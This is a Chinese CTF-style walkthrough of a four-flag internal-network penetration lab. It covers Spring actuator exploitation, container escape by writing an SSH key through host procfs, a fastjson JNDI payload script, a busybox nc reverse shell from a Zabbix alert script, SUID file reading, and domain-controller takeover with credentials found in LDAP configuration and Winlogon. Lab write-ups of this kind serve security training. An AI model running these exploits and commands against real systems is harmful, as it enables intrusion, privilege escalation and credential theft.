GeatWall_2025

介绍

本场景以内网常见服务为基础，构造了一套办公网络环境，你现在作为一名渗透工程师，你的任务是通过信息收集、权限提升、横向移动、服务利用等内网渗透技术，逐步获取场景内的4个flag作为你的成就目标进行提交
正常先fscan扫一下内容

[2025-10-10 12:57:33] [SUCCESS] 端口开放 8.130.128.178:80
[2025-10-10 12:57:33] [SUCCESS] 端口开放 8.130.128.178:22
[2025-10-10 12:57:33] [SUCCESS] 服务识别 8.130.128.178:22 => [ssh] 版本:8.9p1 Ubuntu 3ubuntu0.13 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.13.]
[2025-10-10 12:57:36] [SUCCESS] 端口开放 8.130.128.178:8080
[2025-10-10 12:57:39] [SUCCESS] 服务识别 8.130.128.178:80 => [http]
[2025-10-10 12:57:51] [SUCCESS] 服务识别 8.130.128.178:8080 => [http]
[2025-10-10 12:57:51] [INFO] 存活端口数量: 3
[2025-10-10 12:57:51] [INFO] 开始漏洞扫描
[2025-10-10 12:57:52] [INFO] 加载的插件: ssh, webpoc, webtitle
[2025-10-10 12:57:52] [SUCCESS] 网站标题 http://8.130.128.178      状态码:200 长度:10032  标题:政务服务平台 - 门户与办事大厅
[2025-10-10 12:59:03] [SUCCESS] 目标: http://8.130.128.178:8080
  漏洞名称: poc-yaml-spring-actuator-heapdump-file
  详细信息: author:AgeloVito
            links:https://www.cnblogs.com/wyb628/p/8567610.html
[2025-10-10 12:59:07] [SUCCESS] 目标: http://8.130.128.178:8080
  漏洞名称: poc-yaml-springboot-env-unauth
  详细信息:
            links:https://github.com/LandGrey/SpringBootVulExploit

flag1

有洞直接打

可以直接检测到对应的cve啊，打个内存马进去
简单的翻了翻没找到flag
执行ls -al发现有文件.dockerenv

尝试执行

find / -name core_pattern

/proc/sys/kernel/core_pattern
/host/proc/sys/kernel/core_pattern

挂载宿主机procfs逃逸这个漏洞，
尝试gcc编译脚本发现环境里面libc不适配，使用cdk
cdk-team/CDK: 📦 Make security testing of K8s, Docker, and Containerd easier.
发现大文件不能正常传输，分割传输上去

split -b 100k cdk_linux_amd64_upx cdk.part.

上传之后直接

cat cdk.part.* > cdk_linux
chmod +x ./cdk_linux
./cdk_linux evaluate --full
./cdk_linux run mount-procfs /host/proc/ "mkdir /root/.ssh/"

Syntax error: Unterminated quoted string。容易出现这个问题，注意一下格式
之后把自己的上传上去

./cdk_linux run mount-procfs /host/proc/ 'echo ssh-rsa AAAAB3N4Y........8gFDoRl6pmw== root@kali > /root/.ssh/authorized_keys'

直接ssh登录拿到flag

root@platform:~# cat /flag

flag2

正常流程就是传fscan然后内网穿透工具
看内网的ip

root@platform:~# ifconfig
docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        inet6 fe80::1443:54ff:fe45:d7ef  prefixlen 64  scopeid 0x20<link>
        ether 16:43:54:45:d7:ef  txqueuelen 0  (Ethernet)
        RX packets 3679  bytes 238067 (238.0 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 5462  bytes 7186092 (7.1 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.16.22.12  netmask 255.255.255.0  broadcast 172.16.22.255
        inet6 fe80::216:3eff:fe04:7839  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:04:78:39  txqueuelen 1000  (Ethernet)
        RX packets 25139  bytes 10649611 (10.6 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 26935  bytes 2108965 (2.1 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

测试了一下应该是不出网,这里vshell正向上线

scp /home/orange/tcp_linux_amd64 root @8.130.128.178:/tmp

之后上传fscan到机子里

上面那个172.17.0.1就只有本机的一些东西，没扫出有什么利用的东西，看一下下面一个(扫的时候等的时间有点长)

[2025-10-10 13:43:36] [SUCCESS] 目标 172.16.22.12    存活 (ICMP)
[2025-10-10 13:43:36] [SUCCESS] 目标 172.16.22.14    存活 (ICMP)
[2025-10-10 13:43:36] [SUCCESS] 目标 172.16.22.41    存活 (ICMP)
[2025-10-10 13:43:36] [SUCCESS] 目标 172.16.22.88    存活 (ICMP)
[2025-10-10 13:43:36] [SUCCESS] 目标 172.16.22.253   存活 (ICMP)

172.16.22.41 DC:ZWFW\DC

走个隧道
访问http://172.16.22.88/直接下载apk


猜测和8080有关，直接反编译看一下内容
看组件应该是fastjson，主要发包的代码在com.example.mobile.MainActivity里

• onCreate()：初始化界面并加载 Compose 组件；
• LoginScreen()：定义一个登录界面的 UI；
• sendLoginRequest()：负责发送登录请求到服务器并返回结果。
  接收三个参数：服务器地址、用户名和密码
  这里用的hony师傅的脚本，不太会逆向

import base64  
import os  
import json  
import requests  
from cryptography.hazmat.primitives import serialization, hashes  
from cryptography.hazmat.primitives.asymmetric import padding  
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes  
from cryptography.hazmat.backends import default_backend  
  
# ===== 配置信息 =====SERVER_URL = "http://172.16.22.88:8080/api/login"  
  
# Java 代码中的 RSA 公钥（Base64 格式）  
PUBLIC_KEY_B64 = (  
    "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnKum2FOeaPQumhLBpRauv+OMB6pkdqACjbZYkzzP8CZgjwEwmKauXLxzur1beldNDlVnUs83CnnvanPIYW3oP56t0SoqDmWviBTBJ2aCjtrztFYjBixZEYJ2Exp9f6cdFuSMiucPyuhwY8AuFWnGPJ3Mwt8L8ouV9Lc6Ptp67fCZ0aHr1BVu+pXvHVktbcmeCt+61dnyd9iXTDZfIQ9rwrDsTlkEYORN0hckpFWvgaoNXhXm60ioLkk/qtPZSjir0bpDL0w0iZ3+wRJLtUOe3KyGx+C00S5w2cM0Zw1XlmRQ08yj1nObVkaVsfEU8sSk/XFVnuCrO9YfQCa1uxm5ZQIDAQAB"  
)  
  
# ===== 1. 要发送的 JSON 明文 =====plaintext = """{  
    "@type": "com.sun.rowset.JdbcRowSetImpl",    "dataSourceName": "rmi://172.16.22.12:50388/f94022",    "autoCommit": true}"""  
print(plaintext)  
  
# ===== 2. 生成随机 AES key (128-bit) =====aes_key = os.urandom(16)  
  
# ===== 3. AES/GCM 加密 =====iv = os.urandom(12)  # 12 字节 IVencryptor = Cipher(  
    algorithms.AES(aes_key),  
    modes.GCM(iv),  
    backend=default_backend()  
).encryptor()  
  
ciphertext = encryptor.update(plaintext.encode("utf-8")) + encryptor.finalize()  
tag = encryptor.tag  
  
# Body = IV + 密文 + GCM tagbody_raw = iv + ciphertext + tag  
body_b64 = base64.b64encode(body_raw).decode("utf-8")  
  
# ===== 4. 用 RSA 公钥加密 AES key =====pub_bytes = base64.b64decode(PUBLIC_KEY_B64)  
public_key = serialization.load_der_public_key(pub_bytes, backend=default_backend())  
  
enc_key = public_key.encrypt(  
    aes_key,  
    padding.PKCS1v15()  
)  
enc_key_b64 = base64.b64encode(enc_key).decode("utf-8")  
  
# ===== 5. 发送 POST 请求 =====headers = {  
    "Content-Type": "application/octet-stream",  
    "X-Encrypted-Key": enc_key_b64,  
}  
  
resp = requests.post(SERVER_URL, data=body_b64.encode("utf-8"), headers=headers, timeout=10)  
print("Status:", resp.status_code)  
print("Response:", resp.text)

利用java-chains，把jdk和jar传到机子里面(vshell还挺简单传的)启动用fastjson的templateslmpl的bytecodeconvert里面打入内存马
哥斯拉连接拿到flag

flag3

对其他ip进行检索

proxychains4 dirsearch -u http://172.16.22.14

[15:08:28] 200 -    1KB - /zabbix/

访问一下，网络检索一下默认的密码

Admin/zabbix

进入后台，在告警这里的脚本可以输入内容，我输出的是

whoami;id

在监测这里看最新数据这里有回显，打一个反弹shell

zabbix
uid=115(zabbix) gid=122(zabbix) groups=122(zabbix)

打个反弹shell进去

busybox nc 172.16.22.12 5566 -e sh

在入口机nc一下等待接收
简单的提权拿到flag

zabbix@zabbix:/$ cat flag.txt
cat flag.txt
cat: flag.txt: Permission denied
zabbix@zabbix:/$ find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
-rwsr-xr-x 1 root root 30872 Feb 26  2022 /usr/bin/pkexec
-rwsr-xr-x 1 root root 35200 Apr  9  2024 /usr/bin/umount
-rwsr-xr-x 1 root root 72072 Feb  6  2024 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 59976 Feb  6  2024 /usr/bin/passwd
-rwsr-xr-x 1 root root 72712 Feb  6  2024 /usr/bin/chfn
-rwsr-xr-x 1 root root 35200 Mar 23  2022 /usr/bin/fusermount3
-rwsr-xr-x 1 root root 128072 Mar 24  2022 /usr/bin/ss
-rwsr-xr-x 1 root root 55680 Apr  9  2024 /usr/bin/su
-rwsr-sr-x 1 daemon daemon 55624 Apr 14  2022 /usr/bin/at
-rwsr-xr-x 1 root root 47488 Apr  9  2024 /usr/bin/mount
-rwsr-xr-x 1 root root 44808 Feb  6  2024 /usr/bin/chsh
-rwsr-xr-x 1 root root 40496 Feb  6  2024 /usr/bin/newgrp
-rwsr-xr-x 1 root root 232416 Jun 25 20:48 /usr/bin/sudo

读一下flag

ss -a -F /flag.txt

flag4

在后台的用户里的认证里，有DC的数据，上面有用户，但没有权限看配置文件，看一下服务器里的内容

zabbix@zabbix:/etc/zabbix$ ls -al
ls -al
total 76
drwxr-xr-x   5 root     root  4096 Sep  3 13:47 .
drwxr-xr-x 112 root     root  4096 Sep  4 10:32 ..
-rw-r--r--   1 root     root  1764 Aug 25 18:15 apache.conf
drwxr-xr-x   2 www-data root  4096 Sep  3 13:46 web
-rw-r--r--   1 root     root 17323 Aug 25 18:15 zabbix_agentd.conf
drwxr-xr-x   2 root     root  4096 Aug 25 18:15 zabbix_agentd.d
-rw-------   1 root     root 31264 Sep  3 13:47 zabbix_server.conf
drwxr-xr-x   2 root     root  4096 Aug 25 18:15 zabbix_server.d

ss -a -F /etc/zabbix/zabbix_server.conf
Error: an inet prefix is expected rather than "LogFile=/var/log/zabbix/zabbix_server.log".
Cannot parse dst/src address.

这边猜测一些数据库

mysql -uzabbix -ppassword

这里进去看东西

mysql> select * from userdirectory_ldap\G;
select * from userdirectory_ldap\G;
*************************** 1. row ***************************
 userdirectoryid: 1
            host: 172.16.22.41
            port: 389
         base_dn: OU=Zabbix,DC=zwfw,DC=com
search_attribute: sAMAccountName
         bind_dn: CN=ldapadmin,OU=Zabbix,DC=zwfw,DC=com
   bind_password: XpVLGkQHm8
       start_tls: 0
   search_filter: 
    group_basedn: 
      group_name: cn
    group_member: 
   user_ref_attr: 
    group_filter: 
group_membership: memberOf
   user_username: 
   user_lastname: 
1 row in set (0.00 sec)

给到了密码，bloodhound探测一下

proxychains4 bloodhound-python -u ldapadmin  -p 'XpVLGkQHm8'  -d  zwfw.com  -ns 172.16.22.41  -c all --auth-method ntlm --dns-tcp --zip

能直接DC登录然后链接到administrator
测试一下看是否能登录

proxychains4 nxc winrm 172.16.22.41 -u ldapadmin -p XpVLGkQHm8
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Dynamic chain  ...  192.168.71.1:6666  ...  172.16.22.41:5985  ...  OK
WINRM       172.16.22.41    5985   DC               [*] 10.0 Build 26100 (name:DC) (domain:zwfw.com)
[proxychains] Dynamic chain  ...  192.168.71.1:6666  ...  172.16.22.41:5985  ...  OK
[proxychains] Dynamic chain  ...  192.168.71.1:6666  ...  172.16.22.41:5985  ...  OK
WINRM       172.16.22.41    5985   DC               [+] zwfw.com\ldapadmin:XpVLGkQHm8 (Pwn3d!)

直接登录

proxychains4 evil-winrm -i 172.16.22.41 -u ldapadmin -p 'XpVLGkQHm8'

这里经典流程探测一下

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

给到了密码

Name    REG_SZ    administrator
    AutoAdminLogon    REG_SZ    1
    DefaultPassword    REG_SZ    a4Z6FcRYSp6LLSGO

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\ShellPrograms
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey

直接登录

proxychains4 evil-winrm -i 172.16.22.41 -u administrator -p 'a4Z6FcRYSp6LLSGO'

拿到flag

C:\Users\Administrator\Documents> cat C:\Users\Administrator\Desktop\f*

后话

好久没水文章了，好多年没水了，传一篇，现场其实也打了，漏洞也找到了，手上当时没工具，确实有些难崩，其他就不细说了。文章好多截图都没放，疑似电脑开了hdr导致edge浏览器截图异常曝光，还有我懒。see you later.